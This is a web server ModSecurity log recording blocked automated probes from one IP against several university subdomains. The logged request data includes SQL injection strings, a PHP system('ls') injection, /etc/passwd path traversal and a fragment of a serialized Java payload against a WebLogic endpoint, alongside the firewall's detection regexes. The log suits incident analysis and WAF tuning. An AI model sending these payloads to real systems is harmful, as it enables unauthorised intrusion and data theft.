[Tue Aug 29 11:35:18.753122 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAAPLwLwAAAAX"]
[Tue Aug 29 11:35:19.305716 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAAUUZ90AAABK"]
[Tue Aug 29 11:35:19.307738 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11h8Co-f0AAAT9PQoAAAA1"]
[Tue Aug 29 11:35:19.312295 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAATavwwAAAAg"]
[Tue Aug 29 11:35:19.314575 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAATxvZ8AAAAw"]
[Tue Aug 29 11:35:19.319739 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAAVsUb4AAAAb"]
[Tue Aug 29 11:35:19.354986 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11h8Co-f0AAAUQ7uoAAABH"]
[Tue Aug 29 11:35:20.438603 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11iMCo-f0AAAUOaWoAAABG"]
[Tue Aug 29 11:35:21.304909 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAATUxTgAAAAW"]
[Tue Aug 29 11:35:21.313046 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11icCo-f0AAATQXkMAAAAO"]
[Tue Aug 29 11:35:21.315684 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11icCo-f0AAATWYUEAAAAa"]
[Tue Aug 29 11:35:21.345543 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAAT9PQ0AAAA1"]
[Tue Aug 29 11:35:21.345620 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAAUKhB4AAABC"]
[Tue Aug 29 11:35:21.363591 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAATOA-8AAAAH"]
[Tue Aug 29 11:35:21.370997 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAAUR87sAAABI"]
[Tue Aug 29 11:35:21.372399 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11icCo-f0AAAUQ7uwAAABH"]
[Tue Aug 29 11:35:22.351722 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+ ..." at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "243"] [id "981247"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: ~31~27~20union found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAASHh-QAAAAD"]
[Tue Aug 29 11:35:22.358082 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+ ..." at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "243"] [id "981247"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: ~31~27~20union found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAAVmuLYAAAAT"]
[Tue Aug 29 11:35:22.362771 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+ ..." at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "243"] [id "981247"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: ~31~27~20union found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAAUQ7u0AAABH"]
[Tue Aug 29 11:35:22.370292 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11isCo-f0AAATavxAAAAAg"]
[Tue Aug 29 11:35:22.371983 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAATzVKsAAAAx"]
[Tue Aug 29 11:35:22.405350 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAASEJaMAAAAE"]
[Tue Aug 29 11:35:23.332104 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+ ..." at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "243"] [id "981247"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: ~31~27~20union found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11i8Co-f0AAAVPX4sAAAAF"]
[Tue Aug 29 11:35:23.357213 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAAUQ7vAAAABH"]
[Tue Aug 29 11:35:23.377339 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAATOBAIAAAAH"]
[Tue Aug 29 11:35:23.377730 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAATQXkcAAAAO"]
[Tue Aug 29 11:35:23.393209 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAAT9PRIAAAA1"]
[Tue Aug 29 11:35:24.309550 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11jMCo-f0AAASHh-gAAAAD"]
